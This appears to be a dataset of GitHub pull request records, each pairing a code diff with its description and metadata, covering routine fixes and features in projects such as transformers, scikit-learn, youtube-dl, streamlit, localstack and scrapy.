+ elif isinstance(o, collections.abc.Sequence) and not isinstance(o, str):
return f"[{ f', '.join(map(self.iterencode, o)) }]"
return "\n, ".join(super().iterencode(o, _one_shot))
| Import ABC directly from `collections` was deprecated and removed in Python 3.10. Import from `collections.abc` for Python 3.10 compatibility. | https://api.github.com/repos/microsoft/DeepSpeed/pulls/1851 | 2022-03-22T06:54:52Z | 2022-03-23T17:36:00Z | 2022-03-23T17:36:00Z | 2022-03-23T17:36:00Z | 508 | microsoft/DeepSpeed | 10,311 |
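The `flatten` helper touched by this diff can be reproduced standalone; a sketch using the `collections.abc` import that survives Python 3.10, where the `collections`-level aliases were removed:

```python
import collections.abc

def flatten(d, parent_key="", sep="_"):
    """Same flattening idiom as the patched autotuner helper, with the
    Python 3.10-safe collections.abc.MutableMapping check."""
    items = []
    for key, value in d.items():
        new_key = parent_key + sep + key if parent_key else key
        if isinstance(value, collections.abc.MutableMapping):
            items.extend(flatten(value, new_key, sep=sep).items())
        else:
            items.append((new_key, value))
    return dict(items)
```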
Fix gradient checkpointing bug in xglm | diff --git a/src/transformers/models/xglm/modeling_xglm.py b/src/transformers/models/xglm/modeling_xglm.py
index d8e9952ee7984..b9cef18efc7e1 100755
--- a/src/transformers/models/xglm/modeling_xglm.py
+++ b/src/transformers/models/xglm/modeling_xglm.py
@@ -714,6 +714,14 @@ def forward(
hidden_states = nn.functional.dropout(hidden_states, p=float(self.dropout), training=self.training)
+ if self.gradient_checkpointing and self.training:
+ if use_cache:
+ logger.warning_once(
+ "`use_cache = True` is incompatible with gradient checkpointing`. Setting `use_cache ="
+ " False`..."
+ )
+ use_cache = False
+
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
@@ -739,12 +747,6 @@ def forward(
past_key_value = past_key_values[idx] if past_key_values is not None else None
if self.gradient_checkpointing and self.training:
- if use_cache:
- logger.warning(
- "`use_cache = True` is incompatible with gradient checkpointing`. Setting `use_cache ="
- " False`..."
- )
- use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
 | This PR fixes a bug that a user can encounter when using `generate` with models that use `gradient_checkpointing`.
Fixes Issue https://github.com/huggingface/transformers/issues/21737
cc @younesbelkada or @gante | https://api.github.com/repos/huggingface/transformers/pulls/22127 | 2023-03-13T12:53:46Z | 2023-03-13T13:49:23Z | 2023-03-13T13:49:23Z | 2023-03-13T13:52:02Z | 317 | huggingface/transformers | 11,942 |
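The shape of the fix can be illustrated without transformers: the `use_cache`/checkpointing conflict is now resolved once, before the decoder-layer loop, instead of being re-checked (and re-warned) inside every iteration. All names below are stand-ins; the real code warns via `logger.warning_once`:

```python
import warnings

def run_decoder_layers(num_layers, gradient_checkpointing, training, use_cache):
    """Illustration of the control-flow fix: resolve the conflict once,
    before the layer loop, so no layer ever runs with use_cache=True
    while gradient checkpointing is active."""
    if gradient_checkpointing and training and use_cache:
        warnings.warn("`use_cache = True` is incompatible with gradient "
                      "checkpointing. Setting `use_cache = False`...")
        use_cache = False
    past_key_values = [] if use_cache else None
    for layer_idx in range(num_layers):
        if use_cache:
            past_key_values.append(layer_idx)  # stand-in for a cached KV pair
    return use_cache, past_key_values
```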
FIX: Python3 compatibility. | diff --git a/tokenization_test.py b/tokenization_test.py
index 8a46028ef..0d6d39494 100644
--- a/tokenization_test.py
+++ b/tokenization_test.py
@@ -31,7 +31,11 @@ def test_full_tokenizer(self):
"##ing", ","
]
with tempfile.NamedTemporaryFile(delete=False) as vocab_writer:
- vocab_writer.write("".join([x + "\n" for x in vocab_tokens]))
+ import six
+ if six.PY2:
+ vocab_writer.write("".join([x + "\n" for x in vocab_tokens]))
+ else:
+ vocab_writer.write("".join([x + "\n" for x in vocab_tokens]).encode("utf-8"))
vocab_file = vocab_writer.name
| See [this issue](https://github.com/google-research/bert/issues/269) | https://api.github.com/repos/google-research/bert/pulls/274 | 2018-12-15T17:51:50Z | 2018-12-18T18:25:08Z | 2018-12-18T18:25:08Z | 2018-12-18T18:25:08Z | 177 | google-research/bert | 38,440 |
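The py2/py3 branch in the patch exists because Python 3's `NamedTemporaryFile` opens in binary mode by default, so the joined vocab string must be encoded before writing. The py3 path in isolation (token list shortened for illustration):

```python
import os
import tempfile

vocab_tokens = ["[UNK]", "[CLS]", "[SEP]", "want", "##want", "running"]

# Python 3 opens NamedTemporaryFile in binary mode by default, so the
# joined vocab string must be encoded before writing.
with tempfile.NamedTemporaryFile(delete=False) as vocab_writer:
    vocab_writer.write("".join(tok + "\n" for tok in vocab_tokens).encode("utf-8"))
    vocab_file = vocab_writer.name

with open(vocab_file, encoding="utf-8") as f:
    read_back = f.read().splitlines()
os.remove(vocab_file)
```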
R.3: Fill in placeholder link | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index 0a09b42a3..4df85493e 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -9533,7 +9533,7 @@ Returning a (raw) pointer imposes a lifetime management uncertainty on the calle
delete p;
}
-In addition to suffering from the problem from [leak](#???), this adds a spurious allocation and deallocation operation, and is needlessly verbose. If Gadget is cheap to move out of a function (i.e., is small or has an efficient move operation), just return it "by value" (see ["out" return values](#Rf-out)):
+In addition to suffering from the problem of [leak](#Rp-leak), this adds a spurious allocation and deallocation operation, and is needlessly verbose. If Gadget is cheap to move out of a function (i.e., is small or has an efficient move operation), just return it "by value" (see ["out" return values](#Rf-out)):
Gadget make_gadget(int n)
{
| The placeholder link should lead to #Rp-leak. | https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/2173 | 2024-01-20T13:29:12Z | 2024-04-04T17:07:33Z | 2024-04-04T17:07:33Z | 2024-04-04T17:07:34Z | 257 | isocpp/CppCoreGuidelines | 15,830 |
replay: just load one segment to start replaying | diff --git a/selfdrive/ui/replay/replay.cc b/selfdrive/ui/replay/replay.cc
index caa63fd5e90589..5b0f854acbe429 100644
--- a/selfdrive/ui/replay/replay.cc
+++ b/selfdrive/ui/replay/replay.cc
@@ -128,11 +128,16 @@ void Replay::queueSegment() {
// get the current segment window
SegmentMap::iterator begin, cur, end;
begin = cur = end = segments_.lower_bound(current_segment_);
- for (int i = 0; i < BACKWARD_SEGS && begin != segments_.begin(); ++i) {
- --begin;
- }
- for (int i = 0; i <= FORWARD_SEGS && end != segments_.end(); ++i) {
- ++end;
+ if (cur != segments_.end() && cur->second == nullptr) {
+ // just load one segment on starting replay or seeking
+ end++;
+ } else {
+ for (int i = 0; i < BACKWARD_SEGS && begin != segments_.begin(); ++i) {
+ --begin;
+ }
+ for (int i = 0; i <= FORWARD_SEGS && end != segments_.end(); ++i) {
+ ++end;
+ }
}
// load & merge segments
 | Load just one segment (on starting or seeking) to start the replay, then load the other segments right after the replay has started.
| https://api.github.com/repos/commaai/openpilot/pulls/22598 | 2021-10-18T11:27:34Z | 2021-10-18T19:03:34Z | 2021-10-18T19:03:34Z | 2021-10-18T19:12:53Z | 302 | commaai/openpilot | 9,176 |
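The window-selection logic in `queueSegment` can be sketched in a few lines of Python (the C++ original walks `std::map` iterators; the constants and names here are illustrative placeholders):

```python
BACKWARD_SEGS, FORWARD_SEGS = 2, 5  # illustrative values

def segment_window(segment_ids, loaded, current):
    """Sketch of the change: when the current segment is not loaded yet
    (start of replay or a seek), request only that one segment so
    playback can begin immediately; otherwise request the usual
    backward/forward window around it."""
    i = segment_ids.index(current)
    if current not in loaded:
        return segment_ids[i:i + 1]
    lo = max(0, i - BACKWARD_SEGS)
    hi = min(len(segment_ids), i + FORWARD_SEGS + 1)
    return segment_ids[lo:hi]
```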
[MRG+1] Fix #10229: check_array should fail if array has strings | diff --git a/doc/whats_new/v0.20.rst b/doc/whats_new/v0.20.rst
index 46898954944da..52c1a8821b143 100644
--- a/doc/whats_new/v0.20.rst
+++ b/doc/whats_new/v0.20.rst
@@ -335,6 +335,12 @@ Feature Extraction
(words or n-grams). :issue:`9147` by :user:`Claes-Fredrik Mannby <mannby>`
and `Roman Yurchak`_.
+Utils
+
+- :func:`utils.validation.check_array` yield a ``FutureWarning`` indicating
+ that arrays of bytes/strings will be interpreted as decimal numbers
+ beginning in version 0.22. :issue:`10229` by :user:`Ryan Lee <rtlee9>`
+
Preprocessing
- Fixed bugs in :class:`preprocessing.LabelEncoder` which would sometimes throw
diff --git a/sklearn/utils/tests/test_validation.py b/sklearn/utils/tests/test_validation.py
index 2f134d33c3e40..95f5841ac80ba 100644
--- a/sklearn/utils/tests/test_validation.py
+++ b/sklearn/utils/tests/test_validation.py
@@ -285,6 +285,42 @@ def test_check_array():
result = check_array(X_no_array)
assert_true(isinstance(result, np.ndarray))
+ # deprecation warning if string-like array with dtype="numeric"
+ X_str = [['a', 'b'], ['c', 'd']]
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, X_str, "numeric")
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, np.array(X_str, dtype='U'), "numeric")
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, np.array(X_str, dtype='S'), "numeric")
+
+ # deprecation warning if byte-like array with dtype="numeric"
+ X_bytes = [[b'a', b'b'], [b'c', b'd']]
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, X_bytes, "numeric")
+ assert_warns_message(
+ FutureWarning,
+ "arrays of strings will be interpreted as decimal numbers if "
+ "parameter 'dtype' is 'numeric'. It is recommended that you convert "
+ "the array to type np.float64 before passing it to check_array.",
+ check_array, np.array(X_bytes, dtype='V1'), "numeric")
+
def test_check_array_pandas_dtype_object_conversion():
# test that data-frame like objects with dtype object
diff --git a/sklearn/utils/validation.py b/sklearn/utils/validation.py
index d47c61202332f..70e968ee6d36b 100644
--- a/sklearn/utils/validation.py
+++ b/sklearn/utils/validation.py
@@ -516,6 +516,15 @@ def check_array(array, accept_sparse=False, dtype="numeric", order=None,
# To ensure that array flags are maintained
array = np.array(array, dtype=dtype, order=order, copy=copy)
+ # in the future np.flexible dtypes will be handled like object dtypes
+ if dtype_numeric and np.issubdtype(array.dtype, np.flexible):
+ warnings.warn(
+ "Beginning in version 0.22, arrays of strings will be "
+ "interpreted as decimal numbers if parameter 'dtype' is "
+ "'numeric'. It is recommended that you convert the array to "
+ "type np.float64 before passing it to check_array.",
+ FutureWarning)
+
# make sure we actually converted to numeric:
if dtype_numeric and array.dtype.kind == "O":
array = array.astype(np.float64)
 |
#### Reference Issues/PRs
Fixes #10229
#### What does this implement/fix? Explain your changes.
Adds a deprecation warning if a non-object string-like array (defined as being a subdtype of `np.flexible`) is passed to `check_array` with `dtype="numeric"`. Arrays with object, boolean, and number dtypes are handled as before.
#### Any other comments?
The added deprecation warning indicates that non-object string-like arrays will be handled as object arrays are currently handled, i.e., attempted to be converted to `np.float64`. It seems intuitive to me to treat all string-like arrays (object + flexible) the same, but please let me know if you prefer any alternatives.
For reference: [numpy scalar dtypes](https://docs.scipy.org/doc/numpy/reference/arrays.scalars.html)
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/10495 | 2018-01-18T03:11:24Z | 2018-02-22T13:08:53Z | 2018-02-22T13:08:53Z | 2018-07-17T09:24:34Z | 1,038 | scikit-learn/scikit-learn | 46,370 |
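The new branch depends on NumPy's `np.issubdtype(array.dtype, np.flexible)` check; a pure-Python stand-in that only mirrors the control flow (names and the list-based "array" are illustrative):

```python
import warnings

def check_numeric(values):
    """Stand-in for the new branch in check_array: if a 'numeric' array
    turns out to hold strings/bytes (np.flexible dtypes in the real
    code), warn about the 0.22 behaviour change instead of staying silent."""
    if any(isinstance(v, (str, bytes)) for v in values):
        warnings.warn(
            "Beginning in version 0.22, arrays of strings will be "
            "interpreted as decimal numbers if parameter 'dtype' is "
            "'numeric'.", FutureWarning)
        return values
    return [float(v) for v in values]
```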
[vlive] New extractor for vlive.tv | diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index 1c53a5632df..6bee5b63cc4 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -735,6 +735,7 @@
VKIE,
VKUserVideosIE,
)
+from .vlive import VLiveIE
from .vodlocker import VodlockerIE
from .voicerepublic import VoiceRepublicIE
from .vporn import VpornIE
diff --git a/youtube_dl/extractor/vlive.py b/youtube_dl/extractor/vlive.py
new file mode 100644
index 00000000000..a456f8217f0
--- /dev/null
+++ b/youtube_dl/extractor/vlive.py
@@ -0,0 +1,86 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+import hmac
+from hashlib import sha1
+from base64 import b64encode
+from time import time
+
+from .common import InfoExtractor
+from ..utils import (
+ ExtractorError,
+ determine_ext
+)
+from ..compat import compat_urllib_parse
+
+
+class VLiveIE(InfoExtractor):
+ IE_NAME = 'vlive'
+ # www.vlive.tv/video/ links redirect to m.vlive.tv/video/ for mobile devices
+ _VALID_URL = r'https?://(?:(www|m)\.)?vlive\.tv/video/(?P<id>[0-9]+)'
+ _TEST = {
+ 'url': 'http://m.vlive.tv/video/1326',
+ 'md5': 'cc7314812855ce56de70a06a27314983',
+ 'info_dict': {
+ 'id': '1326',
+ 'ext': 'mp4',
+ 'title': '[V] Girl\'s Day\'s Broadcast',
+ 'creator': 'Girl\'s Day',
+ },
+ }
+ _SECRET = 'rFkwZet6pqk1vQt6SxxUkAHX7YL3lmqzUMrU4IDusTo4jEBdtOhNfT4BYYAdArwH'
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+
+ webpage = self._download_webpage(
+ 'http://m.vlive.tv/video/%s' % video_id,
+ video_id, note='Download video page')
+
+ title = self._og_search_title(webpage)
+ thumbnail = self._og_search_thumbnail(webpage)
+ creator = self._html_search_regex(
+ r'<span[^>]+class="name">([^<>]+)</span>', webpage, 'creator')
+
+ url = 'http://global.apis.naver.com/globalV/globalV/vod/%s/playinfo?' % video_id
+ msgpad = '%.0f' % (time() * 1000)
+ md = b64encode(
+ hmac.new(self._SECRET.encode('ascii'),
+ (url[:255] + msgpad).encode('ascii'), sha1).digest()
+ )
+ url += '&' + compat_urllib_parse.urlencode({'msgpad': msgpad, 'md': md})
+ playinfo = self._download_json(url, video_id, 'Downloading video json')
+
+ if playinfo.get('message', '') != 'success':
+ raise ExtractorError(playinfo.get('message', 'JSON request unsuccessful'))
+
+ if not playinfo.get('result'):
+ raise ExtractorError('No videos found.')
+
+ formats = []
+ for vid in playinfo['result'].get('videos', {}).get('list', []):
+ formats.append({
+ 'url': vid['source'],
+ 'ext': 'mp4',
+ 'abr': vid.get('bitrate', {}).get('audio'),
+ 'vbr': vid.get('bitrate', {}).get('video'),
+ 'format_id': vid['encodingOption']['name'],
+ 'height': vid.get('height'),
+ 'width': vid.get('width'),
+ })
+ self._sort_formats(formats)
+
+ subtitles = {}
+ for caption in playinfo['result'].get('captions', {}).get('list', []):
+ subtitles[caption['language']] = [
+ {'ext': determine_ext(caption['source'], default_ext='vtt'),
+ 'url': caption['source']}]
+
+ return {
+ 'id': video_id,
+ 'title': title,
+ 'creator': creator,
+ 'thumbnail': thumbnail,
+ 'formats': formats,
+ 'subtitles': subtitles,
+ }
| "V" http://www.vlive.tv is a live broadcasting mobile platform targeted at South Korean celebrities
Similar to Periscope, videos are available for viewing after the live broadcast, but only on the app for now.
Example: http://m.vlive.tv/video/1326
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/6621 | 2015-08-20T05:07:05Z | 2015-09-05T07:42:07Z | 2015-09-05T07:42:07Z | 2015-09-05T07:42:22Z | 1,073 | ytdl-org/youtube-dl | 50,076 |
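The request signing used by the extractor is reproducible with the stdlib alone: HMAC-SHA1 over the first 255 characters of the URL concatenated with the millisecond timestamp (`msgpad`), base64-encoded and sent as the `md` query parameter. The secret below is a placeholder, not the real `_SECRET`:

```python
import hmac
from base64 import b64encode
from hashlib import sha1

SECRET = "not-the-real-key"  # placeholder: the extractor ships its own _SECRET

def sign_playinfo_url(url: str, msgpad: str) -> bytes:
    """HMAC-SHA1 over (url[:255] + msgpad), base64-encoded -- the value
    appended as the `md` query parameter."""
    mac = hmac.new(SECRET.encode("ascii"),
                   (url[:255] + msgpad).encode("ascii"), sha1)
    return b64encode(mac.digest())
```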
feat(starfish): Add VCD measurement to Starfish spans table component | diff --git a/static/app/views/starfish/views/spans/spansTable.tsx b/static/app/views/starfish/views/spans/spansTable.tsx
index 83d0e633e26f2..e522f8b9408e8 100644
--- a/static/app/views/starfish/views/spans/spansTable.tsx
+++ b/static/app/views/starfish/views/spans/spansTable.tsx
@@ -13,6 +13,7 @@ import {Organization} from 'sentry/types';
import {EventsMetaType} from 'sentry/utils/discover/eventView';
import {getFieldRenderer} from 'sentry/utils/discover/fieldRenderers';
import type {Sort} from 'sentry/utils/discover/fields';
+import {VisuallyCompleteWithData} from 'sentry/utils/performanceForSentry';
import {decodeScalar} from 'sentry/utils/queryString';
import {useLocation} from 'sentry/utils/useLocation';
import useOrganization from 'sentry/utils/useOrganization';
@@ -98,24 +99,30 @@ export default function SpansTable({
return (
<Fragment>
- <GridEditable
+ <VisuallyCompleteWithData
+ id="SpansTable"
+ hasData={data.length > 0}
isLoading={isLoading}
- data={data as Row[]}
- columnOrder={columnOrder ?? getColumns(moduleName)}
- columnSortBy={[
- {
- key: sort.field,
- order: sort.kind,
- },
- ]}
- grid={{
- renderHeadCell: column => renderHeadCell({column, sort, location}),
- renderBodyCell: (column, row) =>
- renderBodyCell(column, row, meta, location, organization, endpoint, method),
- }}
- location={location}
- />
- <Pagination pageLinks={pageLinks} onCursor={handleCursor} />
+ >
+ <GridEditable
+ isLoading={isLoading}
+ data={data as Row[]}
+ columnOrder={columnOrder ?? getColumns(moduleName)}
+ columnSortBy={[
+ {
+ key: sort.field,
+ order: sort.kind,
+ },
+ ]}
+ grid={{
+ renderHeadCell: column => renderHeadCell({column, sort, location}),
+ renderBodyCell: (column, row) =>
+ renderBodyCell(column, row, meta, location, organization, endpoint, method),
+ }}
+ location={location}
+ />
+ <Pagination pageLinks={pageLinks} onCursor={handleCursor} />
+ </VisuallyCompleteWithData>
</Fragment>
);
}
| The component fetches its own data (for now), so I wanted to add some measurements here. I think there's a good chance the data loading strategy will change soon, but this is a start.
| https://api.github.com/repos/getsentry/sentry/pulls/51905 | 2023-06-29T19:15:27Z | 2023-06-29T19:31:02Z | 2023-06-29T19:31:02Z | 2024-03-15T21:08:13Z | 573 | getsentry/sentry | 44,095 |
add: fibonnaci_simplified version. | diff --git a/fibonacci_SIMPLIFIED b/fibonacci_SIMPLIFIED
new file mode 100644
index 0000000000..77f6854050
--- /dev/null
+++ b/fibonacci_SIMPLIFIED
@@ -0,0 +1,10 @@
+
+#printing fibonnaci series till nth element - simplified version for begginers
+def print_fibonacci(n):
+ current_no = 1
+ prev_no = 0
+ for i in range(n):
+ print(current_no, end = " ")
+ prev_no,current_no = current_no, current_no + prev_no
+
+print_fibonacci(10)
| https://api.github.com/repos/geekcomputers/Python/pulls/2078 | 2024-01-07T09:22:47Z | 2024-01-07T21:29:04Z | 2024-01-07T21:29:04Z | 2024-01-07T21:29:04Z | 148 | geekcomputers/Python | 31,170 | |
Decrease Tornado WebSocket ping_interval to 1s | diff --git a/lib/streamlit/server/server.py b/lib/streamlit/server/server.py
index 239280790002..698daa9832d0 100644
--- a/lib/streamlit/server/server.py
+++ b/lib/streamlit/server/server.py
@@ -69,10 +69,19 @@
TORNADO_SETTINGS = {
- "compress_response": True, # Gzip HTTP responses.
- "websocket_ping_interval": 20, # Ping every 20s to keep WS alive.
- "websocket_ping_timeout": 30, # Pings should be responded to within 30s.
- "websocket_max_message_size": MESSAGE_SIZE_LIMIT, # Up the WS size limit.
+ # Gzip HTTP responses.
+ "compress_response": True,
+ # Ping every 1s to keep WS alive.
+ # 2021.06.22: this value was previously 20s, and was causing
+ # connection instability for a small number of users. This smaller
+ # ping_interval fixes that instability.
+ # https://github.com/streamlit/streamlit/issues/3196
+ "websocket_ping_interval": 1,
+ # If we don't get a ping response within 30s, the connection
+ # is timed out.
+ "websocket_ping_timeout": 30,
+ # Set the websocket message size. The default value is too low.
+ "websocket_max_message_size": MESSAGE_SIZE_LIMIT,
}
| Fixes https://github.com/streamlit/streamlit/issues/3196
I ran some tests with a simulated super-high-latency/low-bandwidth connection, and didn't run into any issues. | https://api.github.com/repos/streamlit/streamlit/pulls/3464 | 2021-06-22T20:30:54Z | 2021-06-23T14:36:47Z | 2021-06-23T14:36:47Z | 2021-07-24T00:37:24Z | 320 | streamlit/streamlit | 22,084 |
Change to SPDX conform license string | diff --git a/requests/__version__.py b/requests/__version__.py
index 5063c3f8ee..d206427e50 100644
--- a/requests/__version__.py
+++ b/requests/__version__.py
@@ -9,6 +9,6 @@
__build__ = 0x023100
__author__ = "Kenneth Reitz"
__author_email__ = "me@kennethreitz.org"
-__license__ = "Apache 2.0"
+__license__ = "Apache-2.0"
__copyright__ = "Copyright Kenneth Reitz"
__cake__ = "\u2728 \U0001f370 \u2728"
 | I suggest changing the license string in the package metadata to an [SPDX-parsable license expression](https://spdx.org/licenses/).
This makes it easier for downstream users to get the license information directly from the package metadata. | https://api.github.com/repos/psf/requests/pulls/6266 | 2022-10-23T18:37:01Z | 2023-08-12T18:51:42Z | 2023-08-12T18:51:42Z | 2023-08-12T18:51:42Z | 154 | psf/requests | 32,418 |
fix invalid access to thread-local access key ID | diff --git a/localstack/aws/handlers/auth.py b/localstack/aws/handlers/auth.py
index 47e36bef89198..ee471ab6a69c2 100644
--- a/localstack/aws/handlers/auth.py
+++ b/localstack/aws/handlers/auth.py
@@ -28,7 +28,9 @@ def __call__(self, chain: HandlerChain, context: RequestContext, response: Respo
headers = context.request.headers
if not headers.get("Authorization"):
- headers["Authorization"] = aws_stack.mock_aws_request_headers(api)["Authorization"]
+ headers["Authorization"] = aws_stack.mock_aws_request_headers(
+ api, access_key="injectedaccesskey"
+ )["Authorization"]
class AccountIdEnricher(Handler):
diff --git a/tests/integration/s3/test_s3_cors.py b/tests/integration/s3/test_s3_cors.py
index a55e921da9c43..728e02284772b 100644
--- a/tests/integration/s3/test_s3_cors.py
+++ b/tests/integration/s3/test_s3_cors.py
@@ -66,7 +66,6 @@ def _match(key: str, response: requests.Response):
@pytest.mark.skipif(condition=LEGACY_S3_PROVIDER, reason="Tests are for new ASF provider")
-@pytest.mark.xfail(reason="xfail tests for now as they are failing") # TODO: reactivate ASAP
class TestS3Cors:
@pytest.mark.aws_validated
def test_cors_http_options_no_config(self, s3_bucket, snapshot, aws_client):
 | Recently, a CORS test has been failing continuously in CI, while it is not reproducible locally.
This PR aims to fix that issue and unblock the community pipeline.
It does so by disabling access to the thread-local-stored access key ID before it is set in the Authorization Header Injector.
Edit: It turns out that the flaky tests were caused by an invalid fallback to a thread-local. Details can be found in the great writeup of @dfangl: https://github.com/localstack/localstack/pull/8134#issuecomment-1512906567
This was an absolute great catch, thanks @dfangl and @bentsku for digging into this! | https://api.github.com/repos/localstack/localstack/pulls/8134 | 2023-04-13T10:11:57Z | 2023-04-18T15:04:24Z | 2023-04-18T15:04:24Z | 2023-04-18T15:04:48Z | 353 | localstack/localstack | 28,666 |
Add Telnet console authentication docs | diff --git a/docs/topics/telnetconsole.rst b/docs/topics/telnetconsole.rst
index ce79c9f3535..49c372598fb 100644
--- a/docs/topics/telnetconsole.rst
+++ b/docs/topics/telnetconsole.rst
@@ -26,8 +26,21 @@ The telnet console listens in the TCP port defined in the
the console you need to type::
telnet localhost 6023
+ Trying localhost...
+ Connected to localhost.
+ Escape character is '^]'.
+ Username:
+ Password:
>>>
-
+
+By default Username is ``scrapy`` and Password is autogenerated. The
+autogenerated Password can be seen on scrapy logs like the example bellow::
+
+ 2018-10-16 14:35:21 [scrapy.extensions.telnet] INFO: Telnet Password: 16f92501e8a59326
+
+Default Username and Password can be overriden by the settings
+:setting:`TELNETCONSOLE_USERNAME` and :setting:`TELNETCONSOLE_PASSWORD`
+
You need the telnet program which comes installed by default in Windows, and
most Linux distros.
@@ -160,3 +173,24 @@ Default: ``'127.0.0.1'``
The interface the telnet console should listen on
+
+.. setting:: TELNETCONSOLE_USERNAME
+
+TELNETCONSOLE_USERNAME
+------------------
+
+Default: ``'scrapy'``
+
+The username used for the telnet console
+
+
+.. setting:: TELNETCONSOLE_PASSWORD
+
+TELNETCONSOLE_PASSWORD
+------------------
+
+Default: ``None``
+
+The password used for the telnet console, default behaviour is to have it
+autogenerated
+
| https://api.github.com/repos/scrapy/scrapy/pulls/3465 | 2018-10-16T17:51:29Z | 2018-10-16T18:08:34Z | 2018-10-16T18:08:34Z | 2018-10-16T18:08:35Z | 397 | scrapy/scrapy | 34,457 | |
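One plausible way to produce an autogenerated credential in the documented format (`16f92501e8a59326`) is 8 random bytes, hex-encoded. Scrapy's actual generation may differ; this sketch only matches the documented shape:

```python
import secrets

def generate_telnet_password(nbytes: int = 8) -> str:
    """Produce a lowercase-hex credential of the documented shape:
    `nbytes` random bytes, hex-encoded (16 characters for nbytes=8)."""
    return secrets.token_hex(nbytes)
```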
Fix broken link in docs of DataFrame.to_hdf | diff --git a/pandas/core/generic.py b/pandas/core/generic.py
index c3db8ef58deb6..eee5f72a05738 100644
--- a/pandas/core/generic.py
+++ b/pandas/core/generic.py
@@ -2576,7 +2576,7 @@ def to_hdf(
See Also
--------
- DataFrame.read_hdf : Read from HDF file.
+ read_hdf : Read from HDF file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_feather : Write out feather-format for DataFrames.
| The link in https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.to_hdf.html in "See also" seems to be broken. This should fix it.
- [ ] closes #xxxx
- [ ] tests added / passed
- [x] passes `black pandas`
- [x] passes `git diff upstream/master -u -- "*.py" | flake8 --diff`
- [ ] whatsnew entry
| https://api.github.com/repos/pandas-dev/pandas/pulls/38854 | 2020-12-31T15:58:31Z | 2020-12-31T18:48:28Z | 2020-12-31T18:48:28Z | 2021-01-01T12:14:28Z | 146 | pandas-dev/pandas | 44,801 |
Updates uri to use six for isinstance comparison for py3 compatibility | diff --git a/lib/ansible/modules/network/basics/uri.py b/lib/ansible/modules/network/basics/uri.py
index 882f3fd5d83928..84da897805de12 100644
--- a/lib/ansible/modules/network/basics/uri.py
+++ b/lib/ansible/modules/network/basics/uri.py
@@ -401,7 +401,7 @@ def main():
if body_format == 'json':
# Encode the body unless its a string, then assume it is pre-formatted JSON
- if not isinstance(body, basestring):
+ if not isinstance(body, six.string_types):
body = json.dumps(body)
lower_header_keys = [key.lower() for key in dict_headers]
if 'content-type' not in lower_header_keys:
| ##### ISSUE TYPE
Bugfix Pull Request
##### COMPONENT NAME
uri
##### ANSIBLE VERSION
```
v2.3
```
##### SUMMARY
Updates uri to use six for isinstance comparison for py3 compatibility | https://api.github.com/repos/ansible/ansible/pulls/20239 | 2017-01-13T19:09:02Z | 2017-01-13T19:16:21Z | 2017-01-13T19:16:21Z | 2019-04-26T20:11:04Z | 170 | ansible/ansible | 49,106 |
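The patched branch in isolation, with plain `str` playing the role of `six.string_types` on Python 3 (a hypothetical helper name; the real code operates on the module's `body` variable inline):

```python
import json

def prepare_json_body(body):
    """Sketch of the patched branch: a string body is assumed to be
    pre-formatted JSON and passed through unchanged; anything else is
    serialized with json.dumps."""
    if not isinstance(body, str):
        body = json.dumps(body)
    return body
```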
fix dirname | diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_alpaca-13b_vicuna-13b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_bard_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_bard_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_bard_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_bard_vicuna-13b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_gpt35_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_gpt35_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_gpt35_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_gpt35_vicuna-13b.jsonl
diff --git a/fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl b/fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl
similarity index 100%
rename from fastchat/eval/table/review/vicuna-13b:20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl
rename to fastchat/eval/table/review/vicuna-13b_20230322-clean-lang/review_llama-13b_vicuna-13b.jsonl
